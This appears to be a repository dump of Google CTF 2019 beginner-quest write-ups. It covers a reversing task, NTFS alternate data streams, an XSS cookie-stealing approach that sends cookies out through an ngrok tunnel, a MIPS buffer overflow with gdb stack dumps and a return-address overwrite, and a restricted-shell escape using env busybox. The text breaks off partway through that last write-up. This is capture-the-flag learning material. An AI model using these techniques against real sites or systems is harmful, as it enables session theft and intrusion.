├── 01-reversing-rand2
│   ├── 01.zip
│   ├── README.md
│   ├── log.txt
│   └── rand2
├── 02-misc-satellite
│   ├── README.md
│   ├── README.pdf
│   ├── ctf2.zip
│   └── init_sat
├── 03-reversing-family-computer
│   ├── 03.zip
│   ├── README.md
│   ├── credentials.txt
│   ├── extract-stream.ps1
│   ├── file0.png
│   └── note.txt
├── 04-web-gov-xss
│   └── README.md
├── 05-pwn-buffer-overflow
│   ├── 05.zip
│   ├── README.md
│   ├── bof
│   ├── console.c
│   ├── controlled-payload
│   ├── flag
│   ├── flag1
│   ├── input-controlled.txt
│   ├── input.txt
│   └── segfault-payload
├── 06-sandbox-readme
│   └── README.md
├── 07-reversing-emoji
│   ├── .gitignore
│   ├── 07.zip
│   ├── README.md
│   ├── __pycache__
│   │   ├── crawl.cpython-36.pyc
│   │   └── vm.cpython-36.pyc
│   ├── ctf_crawl
│   │   ├── ctf_crawl
│   │   │   ├── __init__.py
│   │   │   ├── __pycache__
│   │   │   │   ├── __init__.cpython-36.pyc
│   │   │   │   └── settings.cpython-36.pyc
│   │   │   ├── items.py
│   │   │   ├── middlewares.py
│   │   │   ├── pipelines.py
│   │   │   ├── settings.py
│   │   │   └── spiders
│   │   │       ├── __init__.py
│   │   │       ├── __pycache__
│   │   │       │   ├── __init__.cpython-36.pyc
│   │   │       │   └── cat_images.cpython-36.pyc
│   │   │       └── cat_images.py
│   │   ├── images.zip
│   │   ├── output.json
│   │   └── scrapy.cfg
│   ├── extract-palindroms.py
│   ├── palindromes
│   ├── palindromes.py
│   ├── program
│   ├── translated
│   ├── vm.modified.py
│   └── vm.py
├── 08-misc-drive-to-target
│   ├── README.md
│   └── drive.py
├── 09-web-cwo-xss
│   └── README.md
├── 10-crypto-caulingo
│   ├── 10.zip
│   ├── README.md
│   ├── decode.py
│   ├── msg.txt
│   └── project_dc.pdf
├── 11-hardware-gatelock
│   ├── 11.zip
│   ├── README.md
│   ├── beginner
│   │   ├── auth.sqlite
│   │   ├── env_meta.txt
│   │   ├── force_loaded.txt
│   │   ├── ipban.txt
│   │   ├── map.sqlite
│   │   ├── map_meta.txt
│   │   ├── mesecon_actionqueue
│   │   ├── players.sqlite
│   │   ├── schems
│   │   │   └── challenge.mts
│   │   └── world.mt
│   └── challenge.tgz
├── 12-misc-promo
│   ├── README.md
│   └── screenshot.png
├── README.md
└── assets
    └── map.png
/01-reversing-rand2/01.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/01-reversing-rand2/01.zip
--------------------------------------------------------------------------------
/01-reversing-rand2/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Invitation
3 |
4 | You are a simple life form, exiled from your home planet and in search of a new place to call home. The ruling came fast. Your taste in music was deemed to be far too "out-there-man" for anyone to possibly associate with you anymore. You were given 60 revolutions of Xenon around Fir to leave and never return. Gather whatever possessions and leave. You find your parents' music collection, oddly in it is a golden disc labelled "Property of NASA, if lost please return to: EVNJAKL 1600 Ampitheatre Parkway Mountain View California." The music on the disc was uncovered a while back and was not very interesting. This weird language that said something about "Peace, love and rock and roll. Also we're having a really cool party tonight, so for whoever is out there, bring a friend and come along! Co-ordinates enclosed." On the back the words "Draft, do not distribute or load onto probe" written in big red letters. That could mean anything.
5 |
6 | You'll go, since you have nowhere else to go. But you'll be careful. You well know to learn all you can about alien beings before making contact. They could be hostile, or listen to boring music. Time is slipping away fast, you race aboard the nearest ObarPool Spaceship. But you've never driven one... what next genius?
7 |
8 | ## Enter Space-Time Coordinates
9 | Label: misc
10 |
11 | Ok well done. The console is on. It's asking for coordinates. Beating heavily on the console yields little results, but the only time anything changes on your display is when you put in numbers.. So what numbers are you going to go for? You see the starship's logs, but is there a manual? Or should you just keep beating the console?
12 |
13 |
14 | # Solution
15 | The attachment is a zip file containing a `log.txt` file and a `rand2` program. Running `strings` on the binary shows the flag `CTF{welcome_to_googlectf}`
16 |
--------------------------------------------------------------------------------
/01-reversing-rand2/log.txt:
--------------------------------------------------------------------------------
1 | 0: AC+79 3888{6652492084280_198129318435598}
2 | 1: Pliamas Sos{276116074108949_243544040631356}
3 | 2: Ophiuchus{11230026071572_273089684340955}
4 | 3: Pax Memor -ne4456 Hi Pro{21455190336714_219250247519817}
5 | 4: Camion Gyrin{235962764372832_269519420054142}
6 |
--------------------------------------------------------------------------------
/01-reversing-rand2/rand2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/01-reversing-rand2/rand2
--------------------------------------------------------------------------------
/02-misc-satellite/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Arrival & Reconnaissance
3 |
4 | Having successfully figured out this "coordinate" problem. The ship lurches forward violently into space. This is one of the moments when you realize that some kind of thought or plan would have been good, but typically for you and how you found yourself in this situation, you didn't think too much before acting. Only the stars themselves know where you'll end up.
5 |
6 | After what seems like an eternity, or at least one full season of "Xenon's Next Top Galactic Overlord" you arrive in a system of 9 planetary bodies, though one of them is exceptionally small. You nostalgically remember playing explodatoid with your friends and hunting down planets like this. But this small planet registers a hive of noise and activity on your ship's automated scanners. There's things there! Billions upon trillions of things, moving around, flying, swimming, sliding, falling.
7 |
8 | Of particular interest may be the insect-like creatures flying around this planet, uniformly. One has the words "Osmium Satellites" written on it. Maybe this is a starting point to get to know what's ahead of you.
9 |
10 | ## Satellite
11 | Label: networking
12 |
13 | Placing your ship in range of the Osmiums, you begin to receive signals. Hoping that you are not detected, because it's too late now, you figure that it may be worth finding out what these signals mean and what information might be "borrowed" from them. Can you hear me Captain Tim? Floating in your tin can there? Your tin can has a wire to ground control?
14 |
15 | Find something to do that isn't staring at the Blue Planet.
16 |
17 | # Solution
18 | Another attachment that is a zip file which contains a `README.pdf` and a `init_sat` binary. Opening the pdf shows some text and a picture containing the word `osmium`.
19 | Running the binary shows a prompt asking for a satellite name. Enter `osmium` and it presents 3 choices. Entering `a` will print some information including a link to a google doc `https://docs.google.com/document/d/14eYPluD_pi3824GAFanS29tWdTcKxP_XUxx7e303-3E`. The doc contains a single string `VXNlcm5hbWU6IHdpcmVzaGFyay1yb2NrcwpQYXNzd29yZDogc3RhcnQtc25pZmZpbmchCg==`, which is base64 encoded; we can recognize this by the characters and the `==` padding at the end. Decoding the string gives us
20 | ```
21 | Username: wireshark-rocks
22 | Password: start-sniffing!
23 | ```
24 |
25 | So now with wireshark open, as we enter `a` again and look at the traffic, we can see the flag in the text sent over the network `CTF{4efcc72090af28fd33a2118985541f92e793477f}`
--------------------------------------------------------------------------------
/02-misc-satellite/README.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/README.pdf
--------------------------------------------------------------------------------
/02-misc-satellite/ctf2.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/ctf2.zip
--------------------------------------------------------------------------------
/02-misc-satellite/init_sat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/02-misc-satellite/init_sat
--------------------------------------------------------------------------------
/03-reversing-family-computer/03.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/03-reversing-family-computer/03.zip
--------------------------------------------------------------------------------
/03-reversing-family-computer/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Home Computer
3 | Label: forensics
4 |
5 | Blunderbussing your way through the decision making process, you figure that one is as good as the other and that further research into the importance of Work Life balance is of little interest to you. You're the decider after all. You confidently use the credentials to access the "Home Computer."
6 |
7 | Something called "desktop" presents itself, displaying a fascinating round and bumpy creature (much like yourself) labeled "cauliflower 4 work - GAN post." Your 40 hearts skip a beat. It looks somewhat like your neighbors on XiXaX3. ..Ah XiXaX3... You'd spend summers there at the beach, an awkward kid from ObarPool on a family vacation, yearning, but without nerve, to talk to those cool sophisticated locals.
8 |
9 | So are these "Cauliflowers" earthlings? Not at all the unrelatable bipeds you imagined them to be. Will they be at the party? Hopefully SarahH has left some other work data on her home computer for you to learn more.
10 |
11 | # Solution
12 | This attachment is a zip file containing a `family.ntfs` and `note.txt` file. Opening the `family.ntfs` file in something like 7zip shows the contents of a Windows filesystem. Most of the files are empty, but if we navigate to `Users/Family/Documents` there is a file called `credentials.txt`. Opening the text file shows `I keep pictures of my credentials in extended attributes.`. Searching for ntfs extended attributes did not give much information but I knew there was something called `alternate data streams`, so maybe it meant those. Checking the data streams was easy with powershell
13 | ```ps
14 | Get-Item credentials.txt -stream *
15 | ```
16 | With that command, we can see that there is in fact another stream called `FILE0`. We can then extract the stream contents into a .png file which reveals the flag `CTF{congratsyoufoundmycreds}`
17 |
18 | The script `extract-stream.ps1` will extract the image from the file.
--------------------------------------------------------------------------------
/03-reversing-family-computer/credentials.txt:
--------------------------------------------------------------------------------
1 | I keep pictures of my credentials in extended attributes.
2 |
--------------------------------------------------------------------------------
/03-reversing-family-computer/extract-stream.ps1:
--------------------------------------------------------------------------------
1 | Get-Item credentials.txt -stream *
2 | $file = Get-Content credentials.txt -stream 'FILE0' -Encoding Byte -ReadCount 0
3 | Set-Content 'file0.png' -Encoding Byte -Value $file
4 |
--------------------------------------------------------------------------------
/03-reversing-family-computer/file0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/03-reversing-family-computer/file0.png
--------------------------------------------------------------------------------
/03-reversing-family-computer/note.txt:
--------------------------------------------------------------------------------
1 | If you're on MacOS, you can rename .ntfs to .dmg
2 |
--------------------------------------------------------------------------------
/04-web-gov-xss/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Government Agriculture Network
3 | Label: web
4 |
5 | Well it seems someone can't keep their work life and their home life separate. You vaguely recall on your home planet, posters put up everywhere that said "Loose Zips sink large commercial properties with a responsibility to the shareholders." You wonder if there is a similar concept here.
6 |
7 | Using the credentials to access this so-called Agricultural network, you realize that SarahH was just hired as a vendor or contract worker and given access that was equivalent. You can only assume that Vendor/Contractor is the highest possible rank bestowed upon only the most revered and well regarded individuals of the land and expect information and access to flow like the Xenovian acid streams you used to bathe in as a child.
8 |
9 | The portal picture displays that small very attractive individual whom you instantly form a bond with, despite not knowing. You must meet this entity! Converse and convince them you're meant to be! After a brief amount of time the picture shifts into a biped presumably ingesting this creature! HOW DARE THEY. You have to save them, you have to stop this from happening. Get more information about this Gubberment thing and stop this atrocity.
10 |
11 | You need to get in closer to save them - you beat on the window, but you need access to the cauliflower's host to rescue it.
12 |
13 | # Solution
14 | This one just links to a site `https://govagriculture.web.ctfcompetition.com`. The site just contains 2 images, and an input along with a submit button to create a post. There is also an admin link in the top nav bar. Clicking the admin link just led to `https://govagriculture.web.ctfcompetition.com/admin` but redirected back to the main page. Clicking the submit button did a POST to `https://govagriculture.web.ctfcompetition.com/post` with a response page that just said `Your post was submitted for review. Administator will take a look shortly. `. Nothing else happens afterwards. I was stuck on this for a while as I had no idea what to do since the submit or admin links did not appear to do anything. As the name of the task implies, an xss exploit is used somehow but I couldn't figure out how. After spending a lot of time clicking around, I saw a hint that creating a post would get a fake 'admin' on the server to view the post. Without that hint I would be wasting a lot more time.
15 |
16 | So now with that hint, I assumed that I would have to use xss to grab the cookies when the admin viewed the page and then send it back somehow. Unsure if my ISP even let me expose a webserver, I set up a tunnel using `ngrok`. All I did was run `ngrok http 80` and did not even need to set up a server since all I needed was a way to see the data. After setting that up, I entered this script as the post contents
17 | ```js
18 |
22 | ```
23 | The idea is that the cookies would be encoded and sent to the endpoint through a request when the image tries to load.
24 |
25 | After hitting submit, I looked in the dashboard and saw that indeed a request had been made to the url along with the cookies as a query parameter. A quick decode and we have our flag `CTF{8aaa2f34b392b415601804c2f5f0f24e}`
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/05.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/05.zip
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## STOP GAN
3 | Label: pwn
4 |
5 | Success, you've gotten the picture of your lost love, not knowing that pictures and the things you take pictures of are generally two separate things, you think you've rescued them and their brethren by downloading them all to your ship's hard drive. They're still being eaten, but this is a fact that has escaped you entirely. Your thoughts swiftly shift to revenge. It's important now to stop this program from destroying these "Cauliflowers" as they're referred to, ever again.
6 |
7 | # Solution
8 | This attachment is a zip file containing a `bof` binary and a `console.c` source file. The description for the task also includes the text `buffer-overflow.ctfcompetition.com 1337`. Looking at the source file, we see that the binary `bof` is run using qemu and then we have to send input into that program and cause it to crash. There is also a bonus flag if we can cause a controlled crash. To test locally I just ran `qemu-mipsel bof` which runs the program and shows the prompt `Cauliflower systems never crash >>`. Entering text into the prompt just closes it. Since the goal was to use a buffer overflow I decided to just input a lot of text into the program and with a long enough input, a segfault is created. Now all we have to do is try it on the actual program. So we connect to the server provided in the task `nc buffer-overflow.ctfcompetition.com 1337`, enter `run` then enter our long string of input. After a successful crash, it prints out the flag `CTF{Why_does_cauliflower_threaten_us}`
9 |
10 | Since there is another flag, I decided to take a look at decompiling the `bof` binary. For this I used `ghidra`. Since I don't have much experience with this, it was quite difficult to figure out everything, but after playing around with it for a while, this is what I figured out about what the program looks like
11 | ```c
12 | int main(void)
13 | {
14 |     sighandler_t prevHandler;
15 |     int returnVal;
16 |     byte buffer[260];
17 |
18 |     prevHandler = signal(SIGSEGV, segfault_handler);
19 |     if (prevHandler == SIG_ERR) {
20 |         printf("An error occurred setting a signal handler.");
21 |         returnVal = -1;
22 |     } else {
23 |         puts("Cauliflower systems never crash >>");
24 |         scanf("%s", buffer); /* unbounded read into the 260-byte stack buffer */
25 |         returnVal = 0;
26 |     }
27 |     return returnVal;
28 | }
29 |
30 | void segfault_handler(void)
31 | {
32 |     printf("segfault detected! ***CRASH***");
33 |     print_file("flag");
34 |     exit(0);
35 | }
36 |
37 | void print_file(char *filename)
38 | {
39 |     int fileDescriptor;
40 |     char buffer[4];
41 |     int bytesRead;
42 |
43 |     fileDescriptor = open(filename, O_RDONLY);
44 |     if (fileDescriptor == -1) {
45 |         puts("could not open flag");
46 |         exit(1);
47 |     }
48 |     while ((bytesRead = read(fileDescriptor, buffer, 1)) == 1) { /* copy the file to stdout byte by byte */
49 |         write(STDOUT_FILENO, buffer, 1);
50 |     }
51 |     close(fileDescriptor);
52 |     return;
53 | }
54 | ```
55 |
56 | You can see that it does a `scanf` into a buffer of size 260. Therefore if we input something that is greater than `260 + 4 (frame pointer)` bytes, we should get a segfault because then we overwrite the return address. The `segfault-payload` file contains the data for causing a segfault.
57 |
58 | ```
59 | Stack
60 | +---------------------------+ High
61 | |Previous frame |
62 | | |
63 | +---------------------------+
64 | |Return address |
65 | +---------------------------+
66 | |Buffer |
67 | | |
68 | | |
69 | | |
70 | | |
71 | +---------------------------+
72 | |return value |
73 | +---------------------------+
74 | |signal_handler |
75 | +---------------------------+ Low
76 | ```
77 |
78 | Notice that there is no sign of the hidden flag in there. That was because ghidra removed an unreachable block. If we look at the assembly instead we can see the hidden block.
79 | ```mips
80 | 004009bc 60 1f 11 04 bal scanf ;call scanf()
81 | 004009c0 00 00 00 00 _nop ;branch delay slot
82 | 004009c4 10 00 dc 8f lw gp,0x10(s8) ;??
83 | 004009c8 18 00 c2 8f lw returnVal,0x18(s8) ;load word into returnVal
84 | 004009cc 07 00 40 14 bne returnVal,zero,setNormalReturnValue ;this jump skips over the get hidden flag section
85 | 004009d0 00 00 00 00 _nop
86 | getHiddenFlag
87 | 004009d4 30 80 82 8f lw returnVal,-0x7fd0(gp)
88 | 004009d8 40 08 42 24 addiu returnVal,returnVal,0x840
89 | 004009dc 25 c8 40 00 or t9,returnVal,zero
90 | 004009e0 97 ff 11 04 bal local_flag ;local_flag()
91 | 004009e4 00 00 00 00 _nop ;branch delay slot
92 | 004009e8 10 00 dc 8f lw gp,0x10(s8)
93 | setNormalReturnValue
94 | 004009ec 25 10 00 00 or returnVal,zero,zero
95 | exit
96 | 004009f0 25 e8 c0 03 or sp,s8,zero
97 | 004009f4 24 01 bf 8f lw ra,0x124(sp)
98 | 004009f8 20 01 be 8f lw s8,0x120(sp)
99 | 004009fc 28 01 bd 27 addiu sp,sp,0x128
100 | 00400a00 08 00 e0 03 jr ra
101 | 00400a04 00 00 00 00 _nop
102 | ```
103 |
104 | And this is the print local function
105 | ```c
106 | void local_flag(void)
107 | {
108 | print_file("flag1");
109 | exit(0);
110 | }
111 | ```
112 |
113 | To get a better picture of what is happening, I used qemu with the gdb debugger to step through and examine the stack frame.
114 | ```
115 | > qemu-mipsel-static -g 5555 bof
116 | > gdb-multiarch
117 | > (gdb) target remote localhost:5555
118 | ```
119 |
120 | We can then set a breakpoint after `scanf`
121 | > (gdb) b *0x004009c4
122 |
123 | Then print out information. Here was the information from the gdb session
124 | ```
125 | (gdb) i frame
126 | Stack level 0, frame at 0x7fffd8f0:
127 | pc = 0x4009c4 in main; saved pc = 0x400840
128 | Arglist at 0x7fffd8f0, args:
129 | Locals at 0x7fffd8f0, Previous frame's sp is 0x7fffd8f0
130 | Saved registers:
131 | gp at 0x7fffd7d8, s8 at 0x7fffd8e8, ra at 0x7fffd8ec, pc at 0x7fffd8ec
132 | (gdb) x/100xw $sp
133 | 0x7fffd7c8: 0x00000060 0x7fffd7e4 0x00000001 0x00000000
134 | 0x7fffd7d8: 0x004a8970 0x00000000 0x00000001 0xaaaaaaaa
135 | 0x7fffd7e8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
136 | 0x7fffd7f8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
137 | 0x7fffd808: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
138 | 0x7fffd818: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
139 | 0x7fffd828: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
140 | 0x7fffd838: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
141 | 0x7fffd848: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
142 | 0x7fffd858: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
143 | 0x7fffd868: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
144 | 0x7fffd878: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
145 | 0x7fffd888: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
146 | 0x7fffd898: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
147 | 0x7fffd8a8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
148 | 0x7fffd8b8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
149 | 0x7fffd8c8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
150 | 0x7fffd8d8: 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa 0xaaaaaaaa
151 | 0x7fffd8e8: 0xaaaaaaaa 0x00400840 <-- return address
152 | ```
153 |
154 | From here I tried overwriting the return address to point to the `read_local` function. Writing to the start of the function `0x00400840` successfully jumped to the function but when it entered the `print_file` subroutine it crashed. Still not sure about why this happens. Instead, I skipped over some of the setup in the function and jumped to the address `0x00400860` which is where the stack is being set up for the call into `print_file`. This worked as the flag `CTF{controlled_crash_causes_conditional_correspondence}` was printed out.
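
The stack layout from the gdb session above, together with a bounded replacement for the `scanf("%s")` read, as an added example (not code from the challenge or from this repository). The names `overflow_reach`, `read_token_bounded` and `read_filler` are hypothetical; the three addresses are the ones shown in the gdb output, and the filler input is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Addresses copied from the gdb session in the write-up (qemu-mipsel). */
#define BUF_ADDR      0x7fffd7e4u  /* first 0xaaaaaaaa word in the stack dump */
#define SAVED_S8_ADDR 0x7fffd8e8u  /* "s8 at" in the `i frame` output */
#define SAVED_RA_ADDR 0x7fffd8ecu  /* "ra at" in the `i frame` output */

enum reach { FITS_BUFFER, HITS_SAVED_S8, HITS_SAVED_RA };

/* scanf("%s") stores the token plus a terminating NUL, so a token of
 * token_len bytes writes token_len + 1 bytes starting at the buffer.
 * The saved frame pointer sits 260 bytes in, the return address 264. */
enum reach overflow_reach(size_t token_len)
{
    size_t written = token_len + 1;

    if (written > SAVED_RA_ADDR - BUF_ADDR)
        return HITS_SAVED_RA;
    if (written > SAVED_S8_ADDR - BUF_ADDR)
        return HITS_SAVED_S8;
    return FITS_BUFFER;
}

/* Hardened read: one whitespace-delimited token into dst, whose capacity
 * cap includes the NUL. Returns the token's full length as received, or
 * -1 if no token was available. Bytes beyond cap - 1 are consumed and
 * dropped, so an oversized token can neither overflow dst nor be left in
 * the stream for the next read. The one-line equivalent for a 260-byte
 * buffer is scanf("%259s", buffer), which leaves the excess unread. */
long read_token_bounded(FILE *in, char *dst, size_t cap)
{
    int c;
    size_t stored = 0;
    long seen = 0;

    if (cap == 0)
        return -1;
    while ((c = fgetc(in)) != EOF && isspace(c))
        ;                               /* skip leading whitespace, as %s does */
    if (c == EOF) {
        dst[0] = '\0';
        return -1;
    }
    do {
        if (stored + 1 < cap)           /* always keep room for the NUL */
            dst[stored++] = (char)c;
        seen++;
    } while ((c = fgetc(in)) != EOF && !isspace(c));
    if (c != EOF)
        ungetc(c, in);                  /* leave the delimiter in the stream */
    dst[stored] = '\0';
    return seen;
}

/* Demo helper: write n constructed filler bytes to a temporary file and
 * read them back through the bounded reader, as if they came from stdin. */
long read_filler(size_t n, char *dst, size_t cap)
{
    FILE *f = tmpfile();
    long seen;

    if (f == NULL)
        return -2;
    for (size_t i = 0; i < n; i++)
        fputc('A', f);
    fputc('\n', f);
    rewind(f);
    seen = read_token_bounded(f, dst, cap);
    fclose(f);
    return seen;
}

int main(void)
{
    char buffer[260];                   /* same size as the buffer in bof */
    static const size_t lens[] = { 259, 260, 264, 300 };
    static const char *names[] = { "nothing", "saved s8", "saved ra" };

    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        long seen = read_filler(lens[i], buffer, sizeof buffer);
        printf("token of %3zu bytes: unbounded read clobbers %-8s | "
               "bounded read kept %zu of %ld\n",
               lens[i], names[overflow_reach(lens[i])], strlen(buffer), seen);
    }
    return 0;
}
```

A return value larger than `cap - 1` tells the caller the input was truncated, which is the point at which to reject it rather than continue with partial data.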
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/bof:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/bof
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/console.c:
--------------------------------------------------------------------------------
1 | #include <stdio.h>
2 | #include <stdlib.h>
3 | #include <string.h>
4 |
5 |
6 | /**
7 | * 6e: bufferflow triggering segfault - binary, compile with:
8 | * gcc /tmp/console.c -o /tmp/console -static -s
9 | *
10 | * Console allows the player to get info on the binary.
11 | * Crashing bof will trigger the 1st flag.
12 | * Controlling the buffer overflow in bof will trigger the 2nd flag.
13 | */
14 |
15 | int main() {
16 | setbuf(stdin, NULL);
17 | setbuf(stdout, NULL);
18 | setbuf(stderr, NULL);
19 | char inputs[256];
20 | printf("Your goal: try to crash the Cauliflower system by providing input to the program which is launched by using 'run' command.\n Bonus flag for controlling the crash.\n");
21 | while(1) {
22 | printf("\nConsole commands: \nrun\nquit\n>>");
23 | if (fgets(inputs, 256, stdin) == NULL) {
24 | exit(0);
25 | }
26 | printf("Inputs: %s", inputs);
27 | if ( strncmp(inputs, "run\n\0", 256) == 0 ) {
28 | int result = system("/usr/bin/qemu-mipsel-static ./bof");
29 | continue;
30 | } else if ( strncmp(inputs, "quit\n\0", 256) == 0 ) {
31 | exit(0);
32 | } else {
33 | puts("Unable to determine action from your input");
34 | exit(0);
35 | }
36 | }
37 | return 0;
38 | }
39 |
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/controlled-payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/controlled-payload
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/flag:
--------------------------------------------------------------------------------
1 | {flag}
2 |
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/flag1:
--------------------------------------------------------------------------------
1 | {flag1}
2 |
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/input-controlled.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/input-controlled.txt
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/input.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/input.txt
--------------------------------------------------------------------------------
/05-pwn-buffer-overflow/segfault-payload:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/05-pwn-buffer-overflow/segfault-payload
--------------------------------------------------------------------------------
/06-sandbox-readme/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Work Computer
3 | Label: sandbox
4 |
5 | With the confidence of conviction and decision making skills that made you a contender for Xenon's Universal takeover council, now disbanded, you forge ahead to the work computer. This machine announces itself to you, surprisingly with a detailed description of all its hardware and peripherals. Your first thought is "Why does the display stand need to announce its price? And exactly how much does 999 dollars convert to in Xenonivian Bucklets?" You always were one for the trivialities of things.
6 |
7 | Also presented is an image of a fascinating round and bumpy creature, labeled "Cauliflower for cWo" - are "Cauliflowers" earthlings? Your 40 hearts skip a beat - these are not the strange unrelatable bipeds you imagined earthlings to be.. this looks like your neighbors back home. Such curdley lobes. Will it be at the party?
8 |
9 | SarahH, who appears to be a programmer with several clients, has left open a terminal. Oops. Sorry clients! Aliens will be poking around attempting to access your networks.. looking for Cauliflower. That is, *if* they can learn to navigate such things.
10 |
11 | # Solution
12 | This task only provides the address `readme.ctfcompetition.com 1337`. When connected, we are presented with a shell. Typing `help` shows
13 | ```
14 | > help
15 | Alien's shell
16 | Type program names and arguments, and hit enter.
17 | The following are built in:
18 | cd
19 | help
20 | exit
21 | Use the man command for information on other programs.
22 | ```
23 | Trying something like `ls` shows us two items, `ORME.flag` and `README.flag`, so it seems like there might be two flags. Trying to execute files shows `permission denied`. Let's see what programs are available.
24 | > ls /bin
25 |
26 | ```
27 | arch
28 | busybox
29 | chgrp
30 | chown
31 | conspy
32 | date
33 | df
34 | dmesg
35 | dnsdomainname
36 | dumpkmap
37 | echo
38 | false
39 | df
40 | dmesg
41 | dnsdomainname
42 | dumpkmap
43 | echo
44 | false
45 | fdflush
46 | fsync
47 | getopt
48 | hostname
49 | ionice
50 | iostat
51 | ipcalc
52 | kill
53 | login
54 | ls
55 | lzop
56 | makemime
57 | mkdir
58 | mknod
59 | mktemp
60 | mount
61 | mountpoint
62 | mpstat
63 | netstat
64 | nice
65 | pidof
66 | ping
67 | ping6
68 | pipe_progress
69 | printenv
70 | ps
71 | pwd
72 | reformime
73 | rm
74 | rmdir
75 | run-parts
76 | setpriv
77 | setserial
78 | shell
79 | sleep
80 | stat
81 | stty
82 | sync
83 | tar
84 | true
85 | umount
86 | uname
87 | usleep
88 | watch
89 | ```
90 |
91 | I'm not too familiar with all the tools but one of them probably allows us to access the file. Going down the list, I saw `busybox` which seems promising. However running busybox shows the message `busybox can not be called for alien reasons.` So it seems that this may be our target.
92 |
93 | Running `ls -l`, the `README.flag` file is readable but tools like `cat` or `tail` did not exist. So I went down the list for a tool that could possibly read files. Something I learned was the `makemime` tool because after reading up on it, it appears to be able to read a file. Running
94 | > makemime README.flag
95 |
96 | Gives us:
97 | ```
98 | > makemime README.flag
99 | Mime-Version: 1.0
100 | Content-Type: multipart/mixed; boundary="245967688-281105878-1932398038"
101 |
102 | --245967688-281105878-1932398038
103 | Content-Type: application/octet-stream; charset=us-ascii
104 | Content-Disposition: inline; filename="README.flag"
105 | Content-Transfer-Encoding: base64
106 |
107 | Q1RGezRsbF9ENDc0XzVoNGxsX0IzX0ZyMzN9Cg==
108 | --245967688-281105878-1932398038--
109 | ```
110 |
111 | That string `Q1RGezRsbF9ENDc0XzVoNGxsX0IzX0ZyMzN9Cg==` looks like base64, and indeed decoding it gives us `CTF{4ll_D474_5h4ll_B3_Fr33}`. Now trying it for the other flag just left a blank screen so it was back to figuring out how to open busybox. At least that was the only thing I could think of. We also have to get permissions to access the file. I found a hint for this one which is the `env` command. The `env` command is able to execute a program and running `env busybox` worked. Now all I had to do was chmod and add read permissions
112 | ```
113 | > env busybox chmod +r ORME.flag
114 | > makemime ORME.flag
115 | Mime-Version: 1.0
116 | Content-Type: multipart/mixed; boundary="790050884-595716176-916811417"
117 |
118 | --790050884-595716176-916811417
119 | Content-Type: application/octet-stream; charset=us-ascii
120 | Content-Disposition: inline; filename="ORME.flag"
